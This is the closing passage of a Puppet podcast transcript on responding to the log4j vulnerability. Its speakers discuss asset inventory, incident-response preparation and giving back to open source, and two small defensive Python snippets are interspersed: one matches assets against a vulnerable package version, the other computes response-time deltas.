00:38:46 Jeremy Mill Yeah, I agree. I think step zero for all of these things is inventory, right? Inventory your assets, inventory your software, inventory the bill of materials that makes up, you know, if you're writing software, that you can use that, you know. Right. Knowing that is critical, and then knowing which ones of those assets are the most critical, right, doing that crown jewels analysis so that you know what's the most important thing to secure first, because not everything can be a critical asset. And then, exactly like what Nick said, practicing and being prepared to respond. You know, you don't want to create an incident response checklist while you're responding to an incident. Right, that's the wrong time. So having that ready ahead of time and having practiced and having playbooks made, combined with that crown jewels and that inventory, is going to set you up for success.
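
The inventory plus crown jewels idea can be sketched as a simple lookup. Everything here is illustrative: the `Asset` record, the integer `criticality` scale, the asset names, and the plain dotted-number version comparison are assumptions for this example, and the fixed version is just an input the caller supplies.

```python
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Tuple


@dataclass
class Asset:
    name: str
    criticality: int  # hypothetical scale: higher means more important
    packages: Dict[str, str] = field(default_factory=dict)  # package -> version


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a simple dotted numeric version such as '2.14.1'."""
    return tuple(int(part) for part in version.split("."))


def affected_assets(
    inventory: Iterable[Asset], package: str, fixed_version: str
) -> List[Asset]:
    """Return assets running `package` below `fixed_version`, most critical first."""
    fixed = parse_version(fixed_version)
    hits = [
        asset
        for asset in inventory
        if package in asset.packages
        and parse_version(asset.packages[package]) < fixed
    ]
    return sorted(hits, key=lambda a: (-a.criticality, a.name))


if __name__ == "__main__":
    inventory = [
        Asset("build-agent", 2, {"log4j-core": "2.14.1"}),
        Asset("billing-api", 5, {"log4j-core": "2.15.0"}),
        Asset("wiki", 1, {"log4j-core": "2.17.1"}),
        Asset("dns", 4, {}),
    ]
    for asset in affected_assets(inventory, "log4j-core", "2.17.1"):
        print(asset.name, asset.packages["log4j-core"])
```

With an inventory like this already in place, the first question in an incident ("where do we have it, and what do we fix first?") becomes a query rather than an investigation.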

00:39:51 Ben Ford Absolutely. One thing that we briefly touched on, and I think we could probably close here is the fact that this was an open source project that made a lot of it easier because we were able to look at the code and we're able to sort of like, see what the problems were and figure out if we were vulnerable. But often we don't have that luxury. And the vulnerability is very deep in some proprietary closed source product. And there's pros and cons to both of those. I mean, like if we look at open source projects, we have that transparency, but we also don't have accountability. We don't have somebody with a support agreement that we can file a ticket with. Whereas with commercial vendors, we usually do. Do you have any suggestions for companies for like navigating either of those?

00:40:52 Nick Burgan From my point of view, community is extremely important. You need to be a member of a community, and maybe that is, you know, a community. No one can detect and mitigate these vulnerabilities on their own in an effective way, right? We all need to work together to develop solutions to help us all out, to see these problems coming and to mitigate them when they arrive. So I think it's very important for us to share tools like Google's log4jscanner, like our module, any other tools that are out there so that we can all respond to these as quickly as possible, as effectively as possible.

00:41:35 Jeremy Mill Yeah. I want to second that, for sure. Describing this community, I think, is awesome. And then I also think it's important for organizations to try and donate back, right? You know, like our team, something I've done at other orgs and I'm trying to increase us doing here at Puppet, is we do, you know, hack yourself first Fridays where, you know, we try to do security testing against features of our product, but also, right, that also includes like, hey, here's an open source library that we use quite a bit, right? Donating some of our time and expertise to doing some testing on that, right, doing some fuzzing and, you know, submitting patches or even just raising issues, right? And if you can't do that, right, if that's not what your org does, donating money can be really useful as well, right? But doing something to give back is really important.

00:42:36 Ben Ford And I absolutely agree with that. I think that we should all be contributing back a lot more than we are. And I don't mean us as Puppet the company, I mean, like the entire industry. I think that we could all do a better job at contributing back and participating in this open source community. So I think as we close up here, I think the lesson I'm hearing is that the real critical part of any of these sort of security responses is preparation. And that's like having good inventory, knowing what you have in your infrastructure, and like practice, expertise, using your tools, the things that deploy, the things that orchestrate, the things that report, etcetera. And then during the response itself, having that ability to move quickly to mitigate issues, but in a safe and intentional, controlled manner so that you know exactly what you're deploying and you know where and you have a really good idea of what effects it's going to have. And going back to the preparation a bit, having systems that already do this, the inventory and the orchestration and monitoring and observability systems, I think those are, like, absolutely essential. And whether that's Puppet or Bolt or something else, I think that's the thing that we really want to kind of drive home. It's like, have these systems in place already and know how to use them so that you're ready to use them as quickly as you can when the time comes. Do either of you want to extend on that at all?

00:44:18 Jeremy Mill I think you largely nailed it. We try to describe it on our team as time of detection, to time of mitigation, to time of response, right? Or time of fix. Right. And that, you know, that can take a lot of different forms. But like your time of detection, if you have a good bill of materials, is really low. Your time of mitigation, if you can have a good idea of what the exploit looks like, can be really low. And the time of response, if you're prepared to run something like the log4j module to discover all of your vulnerable assets and fix them, can be really low as well. So, you know, preparing to make sure that all of those, you know, time deltas are as small as possible.
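
One way to track the time deltas Jeremy mentions is to record a timestamp for each milestone and subtract consecutive ones. This is a sketch under assumptions: the function name, the four milestones chosen, and the example timestamps are all hypothetical, not figures from the actual log4j response.

```python
from datetime import datetime, timedelta
from typing import Dict


def response_deltas(
    disclosed: datetime,
    detected: datetime,
    mitigated: datetime,
    fixed: datetime,
) -> Dict[str, timedelta]:
    """Return the elapsed time between consecutive incident milestones."""
    milestones = [disclosed, detected, mitigated, fixed]
    if milestones != sorted(milestones):
        raise ValueError("milestones must be in chronological order")
    return {
        "time_to_detection": detected - disclosed,
        "time_to_mitigation": mitigated - detected,
        "time_to_fix": fixed - mitigated,
    }


if __name__ == "__main__":
    # Made-up timestamps, for illustration only.
    deltas = response_deltas(
        disclosed=datetime(2021, 12, 10, 0, 0),
        detected=datetime(2021, 12, 10, 2, 0),
        mitigated=datetime(2021, 12, 10, 8, 0),
        fixed=datetime(2021, 12, 12, 8, 0),
    )
    for name, delta in deltas.items():
        print(name, delta)
```

Comparing these numbers across incidents or practice drills shows whether the inventory, mitigation, and remediation tooling is actually shrinking each window.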

00:45:06 Nick Burgan Yeah. And adding on to that is, you know, making sure that the tools work for you, right? If you have a set of tools that are cumbersome within your environment, or you have people who don't have the expertise in those tools or are not comfortable with those tools, they're not going to do much good. So make sure that you have the right tools in place. You have the right content in place so that you can very rapidly respond.

00:45:32 Ben Ford So if people have any questions or they want to follow up in conversation with either of you, are you available, maybe in the community Slack or on social media or anything?

00:45:46 Jeremy Mill Yeah, I'm available in the community Slack, especially in the security channel. You know, if you want to talk to me, you can always send me a message and then I'm also on Twitter at @living_syn. Which is a super nerdy and terrible joke.

00:46:03 Ben Ford How many people like, like, reach out to you and make a joke?

00:46:07 Jeremy Mill Not enough. I feel like we need more of that. More nerdy jokes everywhere, please.

00:46:13 Nick Burgan Completely agree. I am also in the community Slack. I'm NickB in our Puppet community Slack. I'm kind of a social media Luddite, so it's about all I have. But you can definitely reach me there.

00:46:24 Ben Ford Right on, and because this module is open source, we are accepting contributions to it. So if you look at this module and you have ways to improve it, we would love for you to submit a PR or an issue or even just talk about it, like ways that we could use that in other ways, like Nick was saying earlier, making it generic so that we can drop other kinds of scanning tools in it. And you don't have to, like, scramble to run, write all these things down because we will attach links to the end of the show notes here. So if you just check it out on the Puppet website, just look for the podcast. You'll see this one listed down at the bottom. There will be a list of all of the links and the things that we talk about. And that's a wrap today. And once again, thanks for being here, thanks for listening, joining us in this conversation. I had a really good time. And even though I thought that I had a pretty decent idea of what the conversation was going to be and what this landscape looks like, I feel like every time I talk to you, it's like my understanding grows just a little bit more. And I love that experience. So thanks for being on here. Thanks for chatting, and thanks for giving me all these wonderful ideas.

00:47:41 Jeremy Mill Thank you so much for having me. Thank you.

00:47:43 Ben Ford Thanks for being here on Pulling the Strings, as always, powered by Puppet.